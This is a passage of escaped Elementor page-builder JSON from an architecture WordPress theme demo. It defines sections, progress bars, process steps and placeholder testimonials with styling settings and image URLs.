litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-